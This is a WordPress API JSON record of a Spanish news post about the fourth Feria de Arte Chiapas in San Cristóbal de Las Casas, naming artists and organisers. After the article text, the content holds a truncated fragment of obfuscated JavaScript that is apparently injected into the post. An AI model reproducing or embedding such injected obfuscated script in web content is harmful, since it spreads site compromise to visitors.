{"id":7247,"date":"2022-12-13T03:43:13","date_gmt":"2022-12-13T03:43:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7247"},"modified":"2022-12-13T03:43:13","modified_gmt":"2022-12-13T03:43:13","slug":"todo-un-exito-la-feria-de-arte-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7247","title":{"rendered":"Todo un \u00e9xito la Feria de Arte Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"788\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-12-at-10.53.53.jpeg\" alt=\"\" class=\"wp-image-7248\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-12-at-10.53.53.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-12-at-10.53.53-300x231.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-12-at-10.53.53-768x591.jpeg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>12 de Diciembre del 2022. San Crist\u00f3bal de Las Casas.- Diciembre es un mes que despide al a\u00f1o en curso y a la vez de celebraci\u00f3n y alegr\u00eda, en esta ocasi\u00f3n en la bella ciudad de San Crist\u00f3bal tuvo la fortuna de vivir con gran entusiasmo y \u00e9xito, la \u201c4a. Feria de Arte Chiapas\u201d, el recinto que alberg\u00f3 dicha Feria fue el Centro de Convenciones de El Carmen, referente hist\u00f3rico y cultural de esta ciudad.<\/p>\n\n\n\n<p>La muestra ecl\u00e9ctica en t\u00e9cnicas, formatos y propuestas, dieron forma y color a los pensamientos de artistas locales e invitados, en especial a los oaxaque\u00f1os bien representados con la presencia del maestro Tom\u00e1s Pineda y sus majestuosas pinturas y Patricio Santiago su asombrosa escultura, reuniendo as\u00ed m\u00e1s de quinientas piezas de gran aporte a la cultura de nuestro tiempo.<\/p>\n\n\n\n<p>M\u00e1s de cien artistas participaron en esta Feria destac\u00e1ndose por sus obras los artistas Rolando Rojas, Tom\u00e1s Pineda, Shinzaburo Takeda, Blanca Ricci, Fulgencio Lazo, Manuel Cunjama, Arturo Pacheco, Patricio Santiago, In\u00e9s Lara, Jes\u00fas Cuevas, Sandra D\u00edaz, Emiliano L\u00f3pez, Omar Medina, Diego Zambrano, Ramiro Jim\u00e9nez, Robie Espinosa, Ninfa Torres, Antun kojtom, Emilio L\u00f3pez Ozuna, Fonky Eduardo, Solrack, Terna, entre otros.<\/p>\n\n\n\n<p>La escultura en piedra del maestro Patricio Santiago, dio la bienvenida a los asistentes como el presidentes municipales, diputados locales, representantes de la cultura a nivel nacional e internacional, Antonio Ram\u00edrez y Rafael P\u00e9rez, organizadores entre otros invitados especiales y artistas presentes, haciendo el recorrido cultural, deleit\u00e1ndose de las maravillosas obras de cada participante, entre las cuales destaca la importante participaci\u00f3n de la artista Blanca Ricci oriunda de San Crist\u00f3bal de Las Casas y reconocida a nivel nacional e internacional por su propuesta pict\u00f3rica s\u00f3lida y sin titubeos, producto de sus conocimientos adquiridos en diferentes talleres en Oaxaca y otras entidades y derivado de sus viajes de aprendizaje en diferentes pa\u00edses del mundo.<\/p>\n\n\n\n<p>Los colores y conceptos en sus pinturas remiten a un sincretismo propio de una identidad Sancristobalense y mexicana, identidad que enaltece a los pueblos originarios y se complementa por su universalidad de pensamiento cr\u00edtico y propositivo.<\/p>\n\n\n\n<p>La Feria de arte Chiapas en este a\u00f1o 2022, viene a reafirmar el compromiso de los organizadores, To\u00f1o y Rafa, artistas e invitados para perpetuar esta luz del buen ver, el buen sentir y buen vivir para con la sociedad, es un proyecto social de v\u00ednculo con los creadores y los receptores del arte, gracias a los participantes en la Subasta celebrada en ese mismo espacio cultural, homenajeando al artista chiapaneco Reynaldo Vel\u00e1squez.<\/p>\n\n\n\n<p>Una serie de ponencias presentadas y un p\u00fablico atento a lo que sucede en la cultura de Chiapas y su contexto presente, siempre hacia el arte y en alto la identidad como mexicanos son los que motivan y obligan a buscar que esta feria se realice en el 2023, en su edici\u00f3n n\u00famero 5.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 12 de Diciembre del 2022. San Crist\u00f3bal de Las Casas.- Diciembre es un mes que despide al a\u00f1o en curso y a la vez de celebraci\u00f3n y alegr\u00eda, en esta ocasi\u00f3n en la bella ciudad de San Crist\u00f3bal tuvo la fortuna de vivir con gran entusiasmo y \u00e9xito, la \u201c4a. Feria de Arte &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7248,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7247","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7247","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7247"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7247\/revisions"}],"predecessor-version":[{"id":7249,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7247\/revisions\/7249"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7248"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7247"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7247"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7247"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}